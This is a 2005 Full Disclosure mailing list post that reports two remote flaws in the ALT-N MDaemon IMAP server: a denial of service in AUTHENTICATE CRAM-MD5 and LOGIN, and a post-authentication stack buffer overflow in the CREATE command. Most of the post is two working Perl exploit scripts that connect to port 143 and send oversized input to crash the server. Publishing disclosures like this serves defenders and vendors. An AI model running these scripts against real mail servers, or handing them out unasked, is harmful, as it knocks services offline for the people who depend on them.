Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

ALT-N MDaemon multiple vulnerabilities

From: kcope <kingcope () gmx net>
Date: Mon, 18 Jul 2005 20:24:09 +0200
Hello this is kcope,
there are two remote vulnerabilities in the latest ALT-N MDaemon imapd product i don't know if any of them is exploitable .. the stack based buffer overflow 
seems promising, but it's not preauth so i didn't investigate it further.

1.) Remote denial of service in AUTHENTICATE LOGIN and AUTHENTICATE CRAM-MD5
2.) Remote stack based buffer overflow after authentication in the imap CREATE statement 

---snip---
###
### MDAEMON remote DoS exploit by kcope
### looks like thereĀ“s a fault in the base64 decoder
### works also for AUTHENTICATE LOGIN
###

use IO::Socket::INET;

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                             PeerPort => '143',
                             Proto    => 'tcp');

$a = "q" x 1000;

print $sock "a001 AUTHENTICATE CRAM-MD5\r\n";
print $sock $a,"\r\n";
print $sock $a,"\r\n";

while (<$sock>) {
print $_; } 
---snip---


---snip---
### MDAEMON stack based buffer overflow
### Remote DoS exploit by kcope
use IO::Socket::INET;
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                             PeerPort => '143',
                             Proto    => 'tcp');

$a = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\" x 10;

print $sock "a001 LOGIN username password\r\n";
print $sock "a001 CREATE $a\r\n";

while (<$sock>) {
print $_; } 
---snip---

-kcope


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: